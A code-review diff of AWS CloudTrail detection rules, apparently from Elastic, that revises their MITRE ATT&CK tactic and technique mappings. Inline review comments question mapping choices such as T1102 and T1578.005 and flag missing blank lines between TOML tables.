@@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - 
diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml index 7a3ec1d8500..ca830abaef2 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,36 +106,54 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index e8de6075067..6bb5af9fa5c 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -125,66 +125,113 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + 
+[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 2cb48308925..903ca5ff57d 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2025/09/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -140,46 +140,60 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1534" name = "Internal Spearphishing" reference = "https://attack.mitre.org/techniques/T1534/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" + [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 2634447e6ad..87d29e6c201 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
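Review bot: The new fourth entry maps this rule to Command and Control via T1102 (Web Service) without any stated rationale; T1102, as I read it, covers legitimate external web services used as C2 infrastructure, whereas a rare user publishing to an SNS topic is already expressed by the existing Cloud Service Hijacking (T1496.004) and Exfiltration Over Web Service (T1567) entries. If the intent is that SNS can relay commands to subscribers, say so in the rule `note`; otherwise the C2 entry looks like over-mapping. The added `reference = "https://attack.mitre.org/tactics/TA0011/"` is followed by `[rule.new_terms]`, and the collapsed view does not show whether a blank line separates them as the other blocks in this hunk are separated.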
@@ -119,11 +119,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +147,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index db71d8487f4..161aa44c399 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -117,11 +117,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" 
@@ -132,14 +127,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -150,9 +145,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" 
@@ -161,13 +171,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index c81083059cd..4012b663436 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
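Review bot: In the `@@ -161,13 +171,30 @@` hunk the context line `[[rule.threat.technique]]` is kept while its body is swapped from T1041 to T1078, and T1041 is re-added above the Exfiltration tactic; the resulting final entry (T1078 / T1078.004 / TA0005) is complete, but `+[[rule.threat.technique.subtechnique]]` follows `+reference = "https://attack.mitre.org/techniques/T1078/"` with no blank separator while every other block rewritten in this file now gets one — add the blank line for consistency. Re-ordering each entry so `[rule.threat.tactic]` comes after its techniques (the earlier hunks of this file and of ml_cloudtrail_rare_method_by_city) is a pure layout change in TOML and is fine; note that this ML rule now spans five tactics, three of them via T1078.004, which is the duplication concern raised earlier in this chunk.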
@@ -121,32 +121,41 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index 37786c113df..a72f180dbaf 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,30 +99,41 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 3e29917bfd5..771fa38a30a 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
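Review bot: T1578.005 (Modify Cloud Compute Configurations) is added for network ACL creation, but as I read the ATT&CK description that sub-technique covers account-level compute settings such as quotas, service limits and enabled regions rather than network controls, which the existing T1562.007 mapping already captures; please confirm the sub-technique is the intended one before it spreads to the other EC2 network rules in this patch. Separately, `+reference = "https://attack.mitre.org/techniques/T1578/005/"` is immediately followed by `[rule.threat.tactic]` without the blank line the rest of this patch inserts between tables.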
@@ -141,6 +141,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index fd04f7d979e..a2105eaa9e0 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
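Review bot: The new Defense Evasion entry ends with `+reference = "https://attack.mitre.org/tactics/TA0005/"` running directly into `[rule.new_terms]`, leaving no blank line between the two tables where the rest of this patch inserts one; a single `+` blank line before `[rule.new_terms]` keeps the layout consistent. The T1578.005 mapping is also a looser fit for route-table edits than for the compute settings the sub-technique describes, though it is applied uniformly across the EC2 network rules here, so it may be a deliberate project convention — worth a one-line rationale if so.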
@@ -117,25 +117,53 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index dde1ff0a43d..16a775ca3a9 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml 
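Review bot: Two table boundaries in the new Defense Evasion block lack the separating blank line — `+reference = "https://attack.mitre.org/techniques/T1562/007/"` runs straight into `+[[rule.threat.technique]]`, and `+reference = "https://attack.mitre.org/techniques/T1578/005/"` into `[rule.threat.tactic]` — while the rest of this hunk adds one between every table. With Initial Access now a third tactic on this rule, the `tags` array (outside this hunk) also needs `Tactic: Initial Access` for the tag/tactic consistency check to pass; mapping T1133 under both Persistence and Initial Access is consistent with the tactics ATT&CK lists for that technique.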
@@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,17 +135,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 829f6ade70b..6edad08e841 100644 --- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -143,24 +143,28 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 16c89c35694..456d11f2abe 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
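Review bot: `+reference = "https://attack.mitre.org/techniques/T1098/001/"` is followed directly by `[rule.threat.tactic]`, dropping the blank line this patch otherwise inserts between tables; one `+` blank line there keeps the file consistent with its siblings. The T1098.001 (Additional Cloud Credentials) mapping itself reads well for a console login profile being created for root.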
@@ -120,39 +120,57 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index cc0704696b8..3c73289d534 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -137,22 +137,39 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml index 61a70e9d11f..b93e5e1776c 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -129,22 +129,26 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml index 4cf0be3208c..9116a811d46 100644 --- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
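Review bot: T1556 (Modify Authentication Process) is added at technique level only, yet registering an external CA as a Roles Anywhere trust anchor is, as I read ATT&CK, closer to T1484.002 (Trust Modification: adding a new root of trust) than to modifying an authentication process; consider whether T1484.002 — already used by the OIDC and SAML provider rules in this patch — is the more precise mapping, or keep both with a short rationale. The added `+reference = "https://attack.mitre.org/techniques/T1556/"` line also runs directly into `[rule.threat.tactic]` without the blank line inserted elsewhere in this patch.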
@@ -116,39 +116,49 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml index 6a4dcd371c0..8c1284af2e7 100644 --- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml +++ 